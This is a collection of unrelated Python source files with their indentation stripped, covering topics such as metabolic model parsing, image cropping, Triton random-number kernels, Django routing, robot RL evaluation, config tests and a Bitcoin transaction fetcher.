tokens = get_tokens(line)
prev_token = ''
# print tokens
for token in tokens:
if in_reaction:
if token == '~':
in_reaction = False
s_coef = -1
reactions.append(reaction)
elif token in ["<-", "<>", "->"]:
s_coef = 1
if token == "<-":
reaction['bounds'] = [-1000.0, 0.0]
elif token == "->":
reaction['bounds'] = [0.0, 1000.0]
else:
reaction['bounds'] = [-1000.0, 1000.0]
elif token == "+":
pass
else:
try:
si = float(token)
except ValueError:
if num_match.match(token):
si = eval(token)
elif len(token.strip()):
metab = token.replace('"', '').replace("'", '')
metabolites.append(metab)
# not a stoichiometric value
reaction['metabolites'][metab] = s_coef * si
si = 1.0
prev_token = token
continue
if in_external:
if token in [',', '(']:
continue
elif token == ')':
in_external = False
else:
token = token.replace('"', '')
metabolites.append(token)
externals.append(token)
rs = dict(
id='{}_tx'.format(token),
metabolites={token: -1.0},
source=source_name,
bounds=[-1000.0, 1000.0]
)
reactions.append(rs)
continue
if in_include:
if token in [',', '(']:
continue
elif token == ')':
in_include = False
elif token in fp_stack:
raise ParseError('Cyclic dependency for file {}'.format(token))
else:
rset, mset, exset = parse_file(token, fp_stack, rel_path)
reactions += rset
metabolites += mset
externals += exset
continue
if token == 'External':
in_external = True
elif token == 'Include':
in_include = True
elif token == ":":
in_reaction = True
s_coef = -1
reaction = dict(
source=source_name,
metabolites={},
id=prev_token.replace('"', '').replace("'", ""),
line=linecount,
)
prev_token = token
return reactions, metabolites, externals
@click.command()
@click.argument('model')
@click.argument('model_id')
@click.option('--name', default=None, help='Specify a name for this model')
@click.option('--output', default='omodel.json', help='output location for json file')
@click.option('--media', default=None, type=str, help='A growth media constraints file')
@click.option('--fixed_fluxes', default=None, help='Path to a json dictionary containing biomass composition')
@click.option('--objective', default='Biomass', help='Objective reaction id')
@click.option('--objective_direction', default='min', help='objective direction (min or max)')
def scrumpy_to_cobra(model, model_id, name, output, media, fixed_fluxes, objective,
objective_direction):
"""
Command line utility for parsing scrumpy files and creating cobrapy models
By default, models use the minimisation of flux objective function approach, though if a lumped biomass reaction
is present, this can be specified as a maximisation objective.
For the minimisation of fluxes approach a biomass composition should be specified.
This should be a json file of fixed biomass transporter reaction identifiers and their associated flux value.
If the lumped biomass reaction is used the media composition will be required for growth.
These values are the lower bounds for the fluxes on uptake reactions.
"""
if fixed_fluxes is not None and os.path.exists(fixed_fluxes):
with open(fixed_fluxes) as mp:
fixed_fluxes = json.load(mp)
else:
fixed_fluxes = None
if media is not None and os.path.exists(media):
with open(media) as mp:
media = json.load(mp)
else:
media = None
model = load_scrumpy_model(model,
media=media,
objective_reactions=[objective],
obj_dir=objective_direction,
fixed_fluxes=fixed_fluxes,
name=name,
model_id=model_id
)
cobra.io.save_json_model(model, output)
|
117513
|
import numpy as np
import json
from PIL import Image
from pathlib import Path
import argparse
import os
def crop_images_bbox(input_dir,output_dir,anno_path, double_path = False):
with open(anno_path) as f:
anno = json.load(f)
imageid2filename = {}
for item in anno['images']:
imageid2filename[item['id']] = item['file_name']
label2conceptname = {}
for item in anno['categories']:
name = item['name'].replace(' ','_')
label2conceptname[item['id']] = name
if double_path == True:
(output_dir/name/name).mkdir(parents=True, exist_ok = True)
else:
(output_dir/name).mkdir(parents=True, exist_ok = True)
for item in anno['annotations']:
bbox = item['bbox']
if bbox[2] < 30 or bbox[3] < 30:
continue
bbox[2] += bbox[0]
bbox[3] += bbox[1]
img = Image.open(input_dir / imageid2filename[item['image_id']])
img_cropped = img.crop(bbox)
concept_name = label2conceptname[item['category_id']]
if double_path == True:
img_cropped.save(output_dir / f"{concept_name}/{concept_name}/{item['id']}.jpg")
else:
img_cropped.save(output_dir / f"{concept_name}/{item['id']}.jpg")
return
parser = argparse.ArgumentParser('Cropping COCO images with bounding boxs')
parser.add_argument('-coco-path', type=str, default = 'data/coco')
parser.add_argument('-concept-path', type=str, default = 'data_256')
args = parser.parse_args()
print(args)
coco_path = Path(args.coco_path)
train_dir = coco_path / 'train2017'
val_dir = coco_path / 'val2017'
train_anno_path = coco_path / 'annotations/instances_train2017.json'
val_anno_path = coco_path / 'annotations/instances_val2017.json'
concept_path = Path(args.concept_path)
concept_path.mkdir(parents=True, exist_ok = True)
concept_train_dir = concept_path / 'concept_train'
concept_train_dir.mkdir(parents=True, exist_ok = True)
concept_val_dir = concept_path / 'concept_test'
concept_val_dir.mkdir(parents=True, exist_ok = True)
crop_images_bbox(val_dir, concept_val_dir, val_anno_path)
crop_images_bbox(train_dir, concept_train_dir, train_anno_path, double_path=True)
|
117524
|
import enum
class AssetType(enum.Enum):
algo = enum.auto()
aggregate_algo = enum.auto()
aggregatetuple = enum.auto()
composite_algo = enum.auto()
composite_traintuple = enum.auto()
data_sample = enum.auto()
dataset = enum.auto()
objective = enum.auto()
node = enum.auto()
testtuple = enum.auto()
traintuple = enum.auto()
compute_plan = enum.auto()
@classmethod
def all(cls):
return [e for e in cls]
@classmethod
def can_be_get(cls):
gettable = cls.all()
gettable.remove(cls.data_sample)
gettable.remove(cls.node)
return gettable
@classmethod
def can_be_listed(cls):
return cls.all()
|
117541
|
import triton
from . import core as tl
PHILOX_KEY_A: tl.constexpr = -1640531527 # 0x9E3779B9
PHILOX_KEY_B: tl.constexpr = -1150833019 # <KEY>
PHILOX_ROUND_A: tl.constexpr = -766435501 # 0xD2511F53
PHILOX_ROUND_B: tl.constexpr = -845247145 # 0xCD9E8D57
N_ROUNDS_DEFAULT = 10 # Default number of rounds for philox
# -------------------
# randint
# -------------------
@triton.jit
def philox_impl(c0, c1, c2, c3, k0, k1, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Run `n_rounds` rounds of Philox for state (c0, c1, c2, c3) and key (k0, k1).
"""
for _ in range(n_rounds):
# update random state
A = PHILOX_ROUND_A
B = PHILOX_ROUND_B
_c0, _c2 = c0, c2
c0 = tl.umulhi(B, _c2) ^ c1 ^ k0
c2 = tl.umulhi(A, _c0) ^ c3 ^ k1
c1 = B * _c2
c3 = A * _c0
# raise key
k0 = k0 + PHILOX_KEY_A
k1 = k1 + PHILOX_KEY_B
return c0, c1, c2, c3
@triton.jit
def philox(seed, c0, c1, c2, c3, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
seed = seed.to(tl.uint64)
seed_hi = ((seed >> 32) & 0xffffffff).to(tl.uint32)
seed_lo = (seed & 0xffffffff).to(tl.uint32)
return philox_impl(c0, c1, c2, c3, seed_lo, seed_hi, n_rounds)
@triton.jit
def randint(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block, returns a single
block of random :code:`int32`.
If you need multiple streams of random numbers,
using `randint4x` is likely to be faster than calling `randint` 4 times.
:param seed: The seed for generating random numbers.
:param offsets: The offsets to generate random numbers for.
"""
ret, _, _, _ = randint4x(seed, offset, n_rounds)
return ret
@triton.jit
def randint4x(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block, returns four
blocks of random :code:`int32`.
This is the maximally efficient entry point
to Triton's Philox pseudo-random number generator.
:param seed: The seed for generating random numbers.
:param offsets: The offsets to generate random numbers for.
"""
# _0 = tl.zeros(offset.shape, offset.dtype)
_0 = offset * 0
return philox(seed, offset, _0, _0, _0, n_rounds)
# -------------------
# rand
# -------------------
# @triton.jit
# def uint32_to_uniform_float(x):
# """
# Numerically stable function to convert a random uint32 into a random float uniformly sampled in [0, 1).
# """
# two_to_the_minus_32: tl.constexpr = 2.328306e-10
# return x * two_to_the_minus_32
@triton.jit
def uint32_to_uniform_float(x):
"""
Numerically stable function to convert a random uint32 into a random float uniformly sampled in [0, 1).
"""
x = x.to(tl.int32, bitcast=True)
max = 4.656613e-10 # = 1/MAX_INT = 1/2147483647.
x = tl.where(x < 0, -x - 1, x)
return x * max
@triton.jit
def rand(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block,
returns a block of random :code:`float32` in :math:`U(0, 1)`
:param seed: The seed for generating random numbers.
:param offsets: The offsets to generate random numbers for.
"""
offset = offset.to(tl.uint32, bitcast=True)
source = randint(seed, offset, n_rounds)
return uint32_to_uniform_float(source)
@triton.jit
def rand4x(seed, offsets, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offsets` block,
returns a 4 blocks of random :code:`float32` in :math:`U(0, 1)`
:param seed: The seed for generating random numbers.
:param offsets: The offsets to generate random numbers for.
"""
offsets = offsets.to(tl.uint32, bitcast=True)
i1, i2, i3, i4 = randint4x(seed, offsets, n_rounds)
u1 = uint32_to_uniform_float(i1)
u2 = uint32_to_uniform_float(i2)
u3 = uint32_to_uniform_float(i3)
u4 = uint32_to_uniform_float(i4)
return u1, u2, u3, u4
# -------------------
# randn
# -------------------
@triton.jit
def pair_uniform_to_normal(u1, u2):
"""Box-Muller transform"""
u1 = tl.maximum(1.0e-7, u1)
th = 6.283185307179586 * u2
r = tl.sqrt(-2.0 * tl.log(u1))
return r * tl.cos(th), r * tl.sin(th)
@triton.jit
def randn(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block,
returns a block of random :code:`float32` in :math:`\\mathcal{N}(0, 1)`
:param seed: The seed for generating random numbers.
:param offsets: The offsets to generate random numbers for.
"""
i1, i2, _, _ = randint4x(seed, offset, n_rounds)
u1 = uint32_to_uniform_float(i1)
u2 = uint32_to_uniform_float(i2)
n1, _ = pair_uniform_to_normal(u1, u2)
return n1
@triton.jit
def randn4x(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block,
returns a 4 blocks of random :code:`float32` in :math:`\\mathcal{N}(0, 1)`
:param seed: The seed for generating random numbers.
:param offsets: The offsets to generate random numbers for.
"""
u1, u2, u3, u4 = rand4x(seed, offset, n_rounds)
n1, n2 = pair_uniform_to_normal(u1, u2)
n3, n4 = pair_uniform_to_normal(u3, u4)
return n1, n2, n3, n4
|
117555
|
from src.base.tile import Tile
class TileLoader:
def __init__(self, bbox=None, image_api=None):
self.bbox = bbox
self.image_api = image_api
self.tile = None
def load_tile(self):
image = self.image_api.get_image(self.bbox)
self.tile = Tile(image, self.bbox)
return self.tile
|
117577
|
import os
api_base = os.environ.get('GENOMELINK_API_BASE', 'https://genomelink.io')
from genomelink.oauth import OAuth
from genomelink.resource.report import Report
|
117619
|
def start() :
driverType = irr.driverChoiceConsole();
if driverType == irr.EDT_COUNT :
return 1;
device = irr.createDevice(driverType, irr.dimension2d_u32(640, 480));
if device == None :
return 1;
driver = device.getVideoDriver();
smgr = device.getSceneManager();
device.getFileSystem().addZipFileArchive("../../media/map-20kdm2.pk3");
mesh = smgr.getMesh("20kdm2.bsp");
node = None;
if mesh != None :
node = smgr.addOctreeSceneNode(mesh.getMesh(0), None, -1, 1024);
if node != None :
node.setPosition(irr.vector3df(-1300,-144,-1249));
smgr.addCameraSceneNodeFPS();
device.getCursorControl().setVisible(False);
lastFPS = -1;
while device.run() :
if device.isWindowActive() :
driver.beginScene(True, True, irr.SColor(255,200,200,200));
smgr.drawAll();
driver.endScene();
fps = driver.getFPS();
if lastFPS != fps :
tmp = "cpgf Irrlicht Python Binding Demo - Quake 3 Map example [";
tmp = tmp + driver.getName();
tmp = tmp + "] fps: ";
tmp = tmp + str(fps);
device.setWindowCaption(tmp);
lastFPS = fps;
device.drop();
return 0;
start();
|
117627
|
import pywhatkit as py
import keyboard
import time
from datetime import datetime
def sendMessage(numbers, message, price):
for number in numbers:
py.sendwhatmsg(number, "{}: {:.10f}".format(message, price), datetime.now().hour,
datetime.now().minute + 2)
keyboard.press_and_release('ctrl+w')
time.sleep(1)
keyboard.press_and_release('enter')
time.sleep(1)
|
117637
|
from django.conf.urls import url, include
from django.contrib import admin
from django.conf import settings
from django.views.generic import TemplateView
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
url(r'^account/', include("accounts.urls", namespace = 'account')),
url(r'^reports/', include("reports.urls", namespace = 'reports')),
url(r'^sales/', include("sales.urls", namespace = 'sales')),
url(r'^purchase/', include("purchase.urls", namespace = 'purchase')),
url(r'^item/', include("item_master.urls", namespace = 'item')),
url(r'^company/', include("company_master.urls", namespace = 'company')),
url(r'^salt/', include("salt_master.urls", namespace = 'salt')),
url(r'^godown/', include("godown_master.urls", namespace = 'godown')),
url(r'^unit/', include("unit_master.urls", namespace = 'unit')),
url(r'^', include("home.urls", namespace = 'home')),
]
|
117655
|
import numpy as np
import torch
import time
import gym
from a2c_ppo_acktr import utils
from a2c_ppo_acktr.envs import make_vec_envs
from common.common import *
import pyrobotdesign as rd
def evaluate(args, actor_critic, ob_rms, env_name, seed, num_processes, device):
eval_envs = make_vec_envs(env_name, seed + num_processes, num_processes,
None, None, device, True)
vec_norm = utils.get_vec_normalize(eval_envs)
if vec_norm is not None:
vec_norm.eval()
vec_norm.ob_rms = ob_rms
eval_episode_rewards = []
obs = eval_envs.reset()
eval_recurrent_hidden_states = torch.zeros(
num_processes, actor_critic.recurrent_hidden_state_size, device=device)
eval_masks = torch.zeros(num_processes, 1, device=device)
while len(eval_episode_rewards) < args.eval_num:
with torch.no_grad():
_, action, _, eval_recurrent_hidden_states = actor_critic.act(
obs,
eval_recurrent_hidden_states,
eval_masks,
deterministic=True)
# Obser reward and next obs
obs, _, done, infos = eval_envs.step(action)
eval_masks = torch.tensor(
[[0.0] if done_ else [1.0] for done_ in done],
dtype=torch.float64,
device=device)
for info in infos:
if 'episode' in info.keys():
eval_episode_rewards.append(info['episode']['r'])
eval_envs.close()
print(" Evaluation using {} episodes: mean reward {:.5f}\n".format(
len(eval_episode_rewards), np.mean(eval_episode_rewards)))
def render(render_env, actor_critic, ob_rms, deterministic = False, repeat = False):
# Get robot bounds
lower = np.zeros(3)
upper = np.zeros(3)
render_env.sim.get_robot_world_aabb(render_env.robot_index, lower, upper)
viewer = rd.GLFWViewer()
viewer.camera_params.position = 0.5 * (lower + upper)
viewer.camera_params.yaw = 0.0
viewer.camera_params.pitch = -np.pi / 6
viewer.camera_params.distance = 2.0 * np.linalg.norm(upper - lower)
time_step = render_env.task.time_step * render_env.frame_skip
while True:
total_reward = 0.
sim_time = 0.
render_time_start = time.time()
with torch.no_grad():
ob = render_env.reset()
done = False
episode_length = 0
while not done:
ob = np.clip((ob - ob_rms.mean) / np.sqrt(ob_rms.var + 1e-8), -10.0, 10.0)
_, u, _, _ = actor_critic.act(torch.tensor(ob).unsqueeze(0), None, None, deterministic = deterministic)
u = u.detach().squeeze(dim = 0).numpy()
ob, reward, done, _ = render_env.step(u)
total_reward += reward
episode_length += 1
# render
render_env.sim.get_robot_world_aabb(render_env.robot_index, lower, upper)
target_pos = 0.5 * (lower + upper)
camera_pos = viewer.camera_params.position.copy()
camera_pos += 5.0 * time_step * (target_pos - camera_pos)
viewer.camera_params.position = camera_pos
viewer.update(time_step)
viewer.render(render_env.sim)
sim_time += time_step
render_time_now = time.time()
if render_time_now - render_time_start < sim_time:
time.sleep(sim_time - (render_time_now - render_time_start))
print_info('rendering:')
print_info('length = ', episode_length)
print_info('total reward = ', total_reward)
print_info('avg reward = ', total_reward / (episode_length * render_env.frame_skip))
if not repeat:
break
del viewer
# render each sub-step
def render_full(render_env, actor_critic, ob_rms, deterministic = False, repeat = False):
# Get robot bounds
lower = np.zeros(3)
upper = np.zeros(3)
render_env.sim.get_robot_world_aabb(render_env.robot_index, lower, upper)
viewer = rd.GLFWViewer()
viewer.camera_params.position = 0.5 * (lower + upper)
viewer.camera_params.yaw = 0.0
viewer.camera_params.pitch = -np.pi / 6
viewer.camera_params.distance = 2.0 * np.linalg.norm(upper - lower)
time_step = render_env.task.time_step
control_frequency = render_env.frame_skip
render_env.set_frame_skip(1)
while True:
total_reward = 0.
sim_time = 0.
render_time_start = time.time()
with torch.no_grad():
ob = render_env.reset()
done = False
episode_length = 0
while episode_length < 128 * control_frequency:
if episode_length % control_frequency == 0:
ob = np.clip((ob - ob_rms.mean) / np.sqrt(ob_rms.var + 1e-8), -10.0, 10.0)
_, u, _, _ = actor_critic.act(torch.tensor(ob).unsqueeze(0), None, None, deterministic = deterministic)
u = u.detach().squeeze(dim = 0).numpy()
ob, reward, done, _ = render_env.step(u)
total_reward += reward
episode_length += 1
# render
render_env.sim.get_robot_world_aabb(render_env.robot_index, lower, upper)
target_pos = 0.5 * (lower + upper)
camera_pos = viewer.camera_params.position.copy()
camera_pos += 20.0 * time_step * (target_pos - camera_pos)
sim_time += time_step
render_time_now = time.time()
if render_time_now - render_time_start < sim_time:
time.sleep(sim_time - (render_time_now - render_time_start))
if sim_time + time_step > render_time_now - render_time_start:
viewer.camera_params.position = camera_pos
viewer.update(time_step)
viewer.render(render_env.sim)
print_info('rendering:')
print_info('length = ', episode_length)
print_info('total reward = ', total_reward)
print_info('avg reward = ', total_reward / (episode_length * render_env.frame_skip))
if not repeat:
break
del viewer
|
117660
|
from typing import Any
from pydantic import BaseModel
from tracardi.domain.enum.yes_no import YesNo
class Settings(BaseModel):
enabled: bool = True
hidden: bool = False
@staticmethod
def as_bool(state: YesNo):
return state.value == state.yes
class SystemSettings(BaseModel):
label: str
value: Any
desc: str
|
117696
|
from .vggs import vgg_all
from lc.models.torch.nincif import nincif_bn
__all__ = ["nin_all"]
class nin_all(vgg_all):
def __init__(self):
super(nin_all, self).__init__("nin_all", nincif_bn(), 'nincif_bn')
|
117822
|
import os
import unittest
from textwrap import dedent
from unittest import mock
from unittest.mock import patch
from codecarbon.core.config import (
clean_env_key,
get_hierarchical_config,
parse_env_config,
parse_gpu_ids,
)
from codecarbon.emissions_tracker import EmissionsTracker
from tests.testutils import get_custom_mock_open
class TestConfig(unittest.TestCase):
def test_clean_env_key(self):
for key in [1, None, 0.2, [], set()]:
with self.assertRaises(AssertionError):
clean_env_key(key)
for (key, target) in [
("", ""),
("USER", "user"),
("CODECARBON_TEST", "test"),
("CODECARBON_TEST_VALUE", "test_value"),
("CODECARBON_TEST_1", "test_1"),
("CODECARBON_1", "1"),
]:
self.assertEqual(clean_env_key(key), target)
def test_parse_gpu_ids(self):
for (ids, target) in [
("0,1,2", [0, 1, 2]),
("[0, 1, 2", [0, 1, 2]),
("(0, 1, 2)", [0, 1, 2]),
("[1]", [1]),
("1", [1]),
("0", [0]),
("", []),
(1, 1),
]:
self.assertEqual(parse_gpu_ids(ids), target)
@mock.patch.dict(
os.environ,
{
"USER": "yes",
"CODECARBON_TEST": "test-VALUE",
"CODECARBON_TEST_KEY": "this_other_value",
},
)
def test_parse_env_config(self):
self.assertDictEqual(
parse_env_config(),
{"codecarbon": {"test": "test-VALUE", "test_key": "this_other_value"}},
)
def test_read_confs(self):
global_conf = dedent(
"""\
[codecarbon]
no_overwrite=path/to/somewhere
local_overwrite=ERROR:not overwritten
syntax_test_key= no/space= problem2
"""
)
local_conf = dedent(
"""\
[codecarbon]
local_overwrite=SUCCESS:overwritten
local_new_key=cool value
"""
)
with patch(
"builtins.open", new_callable=get_custom_mock_open(global_conf, local_conf)
):
conf = dict(get_hierarchical_config())
target = {
"no_overwrite": "path/to/somewhere",
"local_overwrite": "SUCCESS:overwritten",
"syntax_test_key": "no/space= problem2",
"local_new_key": "cool value",
}
self.assertDictEqual(conf, target)
@mock.patch.dict(
os.environ,
{
"USER": "useless key",
"CODECARBON_ENV_OVERWRITE": "SUCCESS:overwritten",
"CODECARBON_ENV_NEW_KEY": "cool value",
},
)
def test_read_confs_and_parse_envs(self):
global_conf = dedent(
"""\
[codecarbon]
no_overwrite=path/to/somewhere
local_overwrite=ERROR:not overwritten
syntax_test_key= no/space= problem2
env_overwrite=ERROR:not overwritten
"""
)
local_conf = dedent(
"""\
[codecarbon]
local_overwrite=SUCCESS:overwritten
local_new_key=cool value
env_overwrite=ERROR:not overwritten
"""
)
with patch(
"builtins.open", new_callable=get_custom_mock_open(global_conf, local_conf)
):
conf = dict(get_hierarchical_config())
target = {
"no_overwrite": "path/to/somewhere",
"local_overwrite": "SUCCESS:overwritten",
"env_overwrite": "SUCCESS:overwritten",
"syntax_test_key": "no/space= problem2",
"local_new_key": "cool value",
"env_new_key": "cool value",
}
self.assertDictEqual(conf, target)
def test_empty_conf(self):
global_conf = ""
local_conf = ""
with patch(
"builtins.open", new_callable=get_custom_mock_open(global_conf, local_conf)
):
conf = dict(get_hierarchical_config())
target = {}
self.assertDictEqual(conf, target)
@mock.patch.dict(
os.environ,
{
"CODECARBON_SAVE_TO_FILE": "true",
"CODECARBON_GPU_IDS": "0, 1",
"CODECARBON_PROJECT_NAME": "ERROR:not overwritten",
},
)
def test_full_hierarchy(self):
global_conf = dedent(
"""\
[codecarbon]
measure_power_secs=10
output_dir=ERROR:not overwritten
save_to_file=ERROR:not overwritten
"""
)
local_conf = dedent(
"""\
[codecarbon]
output_dir=/success/overwritten
emissions_endpoint=http://testhost:2000
gpu_ids=ERROR:not overwritten
"""
)
with patch(
"builtins.open", new_callable=get_custom_mock_open(global_conf, local_conf)
):
tracker = EmissionsTracker(
project_name="test-project", co2_signal_api_token="signal-token"
)
self.assertEqual(tracker._measure_power_secs, 10)
self.assertEqual(tracker._output_dir, "/success/overwritten")
self.assertEqual(tracker._emissions_endpoint, "http://testhost:2000")
self.assertEqual(tracker._gpu_ids, [0, 1])
self.assertEqual(tracker._co2_signal_api_token, "signal-token")
self.assertEqual(tracker._project_name, "test-project")
self.assertTrue(tracker._save_to_file)
|
117834
|
import argparse
import keras.backend as K
from keras.layers import Input, Conv2D, Add
from keras.models import Model
from keras.utils import plot_model
import utils
from config import img_size, channel, kernel
def build_model(scale, num_layers=32, feature_size=256, scaling_factor=0.1):
input_tensor = Input(shape=(img_size, img_size, channel))
# One convolution before res blocks and to convert to required feature depth
x = Conv2D(feature_size, (kernel, kernel), activation='relu', padding='same', name='conv1')(input_tensor)
# Store the output of the first convolution to add later
conv_1 = x
"""
This creates `num_layers` number of resBlocks
a resBlock is defined in the paper as
(excuse the ugly ASCII graph)
x
|\
| \
| conv2d
| relu
| conv2d
| /
|/
+ (addition here)
|
result
"""
"""
Doing scaling here as mentioned in the paper:
`we found that increasing the number of feature
maps above a certain level would make the training procedure
numerically unstable. A similar phenomenon was
reported by Szegedy et al. We resolve this issue by
adopting the residual scaling with factor 0.1. In each
residual block, constant scaling layers are placed after the
last convolution layers. These modules stabilize the training
procedure greatly when using a large number of filters.
In the test phase, this layer can be integrated into the previous
convolution layer for the computational efficiency.'
"""
# Add the residual blocks to the model
for i in range(num_layers):
x = utils.res_block(x, feature_size, scale=scaling_factor)
x = Conv2D(feature_size, (kernel, kernel), padding='same')(x)
x = Add()([x, conv_1])
# Upsample output of the convolution
x = utils.upsample(x, scale, feature_size)
outputs = x
model = Model(inputs=input_tensor, outputs=outputs, name="EDSR")
return model
if __name__ == '__main__':
ap = argparse.ArgumentParser()
ap.add_argument("-s", "--scale", help="scale")
args = vars(ap.parse_args())
scale = int(args["scale"])
m = build_model(scale)
print(m.summary())
plot_model(m, to_file='model.svg', show_layer_names=True, show_shapes=True)
K.clear_session()
|
117842
|
import cld3
def detect_language(text: str) -> str:
prediction = cld3.get_language(text)
if prediction and prediction.is_reliable:
return prediction.language
|
117867
|
import json
import os
import random
import requests
import sys
import time
CHAIN_API_KEY = os.environ.get('CHAIN_API_KEY', None)
CHAIN_API_SECRET = os.environ.get('CHAIN_API_SECRET', None)
def get_from_chain(url_adder):
url = 'https://api.chain.com/v2/bitcoin/%s' % (url_adder)
ok = False
while not ok:
try:
r = requests.get(url, auth=(CHAIN_API_KEY, CHAIN_API_SECRET))
r.raise_for_status()
ok = True
except requests.HTTPError as e:
if r.status_code == 429: # Too many requests
time.sleep(1)
else:
print("Request was to %s" % (url))
raise e
b = json.loads(r.text)
return b
def get_block(block):
''' block can be: a hash, index or "latest" '''
return get_from_chain("blocks/%s" % (block))
def get_txn(tx):
tx_json = _get_txn(tx)
raw_txn = _get_txn(tx_json['hash'], True)
tx_json['hex'] = raw_txn['hex']
return tx_json
def _get_txn(tx, raw=False):
url_adder = "transactions/%s" % (tx)
if raw:
url_adder += '/hex'
return get_from_chain(url_adder)
if __name__ == "__main__":
last_block_index = get_block("latest")['height']
print("last_block_index = %d" % (last_block_index))
num_txns = 2500
full_blocks = 50
block_indices = [random.randrange(0, last_block_index) for i in range(num_txns)]
txns = []
special_txns = ["52759f4ed9bf231014f040c7d0329e783aaa93cf973136d131b0cd55b9bf45cf",
"39409570293e8ec38970b0da814cbb826e75501036ac2f42836859b3ac8120ea",
"a258709e0f21a2cfdf053c3ee08b547dee1574179fbb964b37a43c7cd37c5f74"]
for tx_hash in special_txns:
tx = get_txn(tx_hash)
txns.append(tx)
blocks = []
blocks_grabbed = 0
for bi in block_indices:
b = get_block(bi)
if blocks_grabbed < full_blocks:
blocks.append(b)
# Grab all the txns in this block
for t, txn_hash in enumerate(b['transaction_hashes']):
sys.stdout.write("\rGrabbing txn #%d/%d for block %d (%d/%d) ..." %
(t, len(b['transaction_hashes']), bi, blocks_grabbed + 1, full_blocks))
txns.append(get_txn(txn_hash))
blocks_grabbed += 1
# Dump the file along the way
with open("blocks.json", 'w') as f:
json.dump(blocks, f)
else:
got_tx = False
while not got_tx:
try:
tx_num = random.randrange(0, len(b['transaction_hashes']))
tx = get_txn(b['transaction_hashes'][tx_num])
tx['block_version'] = b['version']
txns.append(tx)
got_tx = True
except:
pass
print("\rblock = %d (version: %d), used txn %d" % (bi, b['version'], tx_num))
with open("txns.json", 'w') as f:
json.dump(txns, f)
|
117873
|
from jsonobject import (BooleanProperty, DefaultProperty, IntegerProperty,
JsonObject, ListProperty, StringProperty)
class TlsResult(JsonObject):
ips_scanned = IntegerProperty()
protocols = ListProperty(StringProperty())
hsts_present = BooleanProperty()
trusted = BooleanProperty()
scan_results = DefaultProperty()
domain = StringProperty()
|
117874
|
from __future__ import print_function
from urllib.request import Request, urlopen
import urllib
base_uri = 'http://127.0.0.1:8000?text='
def coref(text, no_detail=False):
def get_raw_data_from_web(a_uri):
req = Request(a_uri, headers={'User-Agent': 'PythonBook/1.0'})
http_response = urlopen(req)
data = http_response.read()
return data
encoded_text = urllib.parse.quote(text, safe='')
if no_detail:
z = '&no_detail=1'
else:
z = ''
raw_data = get_raw_data_from_web(base_uri + encoded_text + z)
return raw_data.decode("UTF8")
print(coref('My sister has a dog named Sam. She loves him'))
print(coref('My sister has a dog named Sam. She loves him', no_detail=True))
|
117885
|
import pandas as pd
import torch
from torch.utils.data import Dataset
from typing import Tuple, List, Callable
class Corpus(Dataset):
"""Corpus class"""
def __init__(self, filepath: str, transform_fn: Callable[[str], List[int]]) -> None:
"""Instantiating Corpus class
Args:
filepath (str): filepath
transform_fn (Callable): a function that can act as a transformer
"""
self._corpus = pd.read_csv(filepath, sep='\t')
self._transform = transform_fn
def __len__(self) -> int:
return len(self._corpus)
def __getitem__(self, idx: int) -> Tuple[torch.Tensor, torch.Tensor]:
q1, q2, is_duplicate = self._corpus.iloc[idx].tolist()
list_of_indices, list_of_token_types = [torch.tensor(elm) for elm in self._transform(q1, q2)]
label = torch.tensor(is_duplicate)
return list_of_indices, list_of_token_types, label
|
117889
|
from .base import *
class apps(object):
"""
cytoscape session interface as shown in CyREST's swagger documentation.
:param url: an url of the type 'http://' + host + ':' + str(port) + '/' + version + '/'.
"""
def __init__(self, url):
self.__url = url + 'commands/apps'
self.___url=url
def getAppList(self, verbose=None):
"""
Returns installed Cytoscape Apps that have CyREST accessible Functions or Commands, as a list of App names.
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'apps', method="H", verbose=verbose, parse_params=False)
return response
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.